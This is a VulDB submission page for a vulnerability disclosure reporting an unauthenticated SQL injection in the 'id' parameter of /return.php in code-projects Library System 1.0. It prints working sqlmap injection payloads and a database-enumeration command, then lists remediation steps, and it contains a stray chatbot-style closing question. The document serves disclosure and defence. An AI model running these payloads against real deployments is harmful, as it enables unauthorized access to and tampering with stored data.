| タイトル | code-projects Library System 1.0 SQL Injection |
|---|
| 説明 |
# ???? Vulnerability Report: code-projects Software Library 1.0 /return.php SQL Injection
## ???? Summary
| Detail | Content |
| :--- | :--- |
| **Affected Product Name** | Library System |
| **Affected Version** | V1.0 |
| **Vendor Homepage** | `https://code-projects.org/library-system-in-php-with-source-code/` |
| **Vulnerability Type** | SQL Injection (SQLi) |
| **Affected File** | `/return.php` |
| **Affected Parameter** | `id` (GET) |
| **Authentication Required** | None (No login or authorization required to exploit) |
| **Submitter** | yudeshui |
-----
## ???? Description and Impact
### Root Cause
The vulnerability resides in the file `/return.php`, where the application processes user-supplied input from the **`id`** (ID) parameter. The program **directly concatenates** this parameter value into the SQL query string **without sufficient cleaning, validation, or sanitization**.
### Impact
A successful attack allows an attacker to inject malicious SQL code, thereby manipulating the original database query logic. This can lead to severe consequences, including:
* **Unauthorized Database Access:** Stealing sensitive data such as user information or book records.
* **Data Tampering/Destruction:** Modifying, deleting, or adding records in the database.
* **System Control:** In severe cases, gaining system-level control, posing a serious threat to system security and business continuity.
-----
## ????️ Vulnerability Details and PoC
The vulnerability is located in the processing of the `id` parameter within a GET request.
### PoC Payload Examples
The following are examples of SQL injection payloads captured during testing with the `sqlmap` tool:
```
---
Parameter: id (GET)
Type: boolean-based blind
Title: Boolean-based blind - Parameter replace (original value)
Payload: id=(SELECT (CASE WHEN (1511=1511) THEN 1 ELSE (SELECT 4364 UNION SELECT 7959) END))
Type: error-based
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1 OR (SELECT 8658 FROM(SELECT COUNT(*),CONCAT(0x71717a7a71,(SELECT (ELT(8658=8658,1))),0x716a767671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1 AND (SELECT 9721 FROM (SELECT(SLEEP(5)))iHXZ)
---
```
### Sqlmap Screenshot Example (Database Enumeration)
```
sqlmap -u "http://dede:802/return.php?id=1" --batch --dbs
```
-----
<img width="2162" height="829" alt="Image" src="https://github.com/user-attachments/assets/fe4ed85c-803e-4d48-8469-b52f7933a86b" />
## ✅ Suggested Repair Measures
To completely resolve this SQL injection issue and enhance overall system security, the following defensive coding practices are strongly recommended:
### 1\. Use Prepared Statements and Parameter Binding (Primary Defense)
This is the most effective method against SQL injection. Prepared statements separate the structure of the SQL command from the user-supplied data, ensuring the input is treated as a literal string value and cannot be interpreted as executable SQL code.
* **Action:** Rewrite all database queries in `/return.php` (and all other files) to use **Prepared Statements** (e.g., using **`mysqli_prepare()`** or **PDO** with parameter binding).
### 2\. Strict Input Validation and Filtering
Strictly validate and filter all user input data to ensure it conforms to the expected format, type, and length.
* **Action:** For parameters like `id` which should be numeric, use PHP functions like **`filter_var()`** or **`is_numeric()`** for strict checking.
### 3\. Minimize Database User Permissions
Adhere to the Principle of Least Privilege. The database account used by the web application for daily operations should only possess the minimum necessary permissions.
* **Action:** Ensure the application's database user **does not** have administrative privileges (e.g., `DROP`, `ALTER`, or file system access) to limit the impact of a successful breach.
### 4\. Regular Security Audits
Establish a routine process for security code reviews and auditing to proactively identify and fix potential vulnerabilities before they are exploited.
-----
Would you like me to provide a specific code example in PHP demonstrating how to use **prepared statements** to fix this vulnerability? |
|---|
| ソース | ⚠️ https://github.com/rassec2/dbcve/issues/2 |
|---|
| ユーザー | yudeshui (UID 91129) |
|---|
| 送信 | 2025年11月21日 14:33 (5 月 ago) |
|---|
| モデレーション | 2025年11月23日 10:43 (2 days later) |
|---|
| ステータス | 承諾済み |
|---|
| VulDBエントリ | 333343 [code-projects Library System 1.0 /return.php 識別子 SQLインジェクション] |
|---|
| ポイント | 20 |
|---|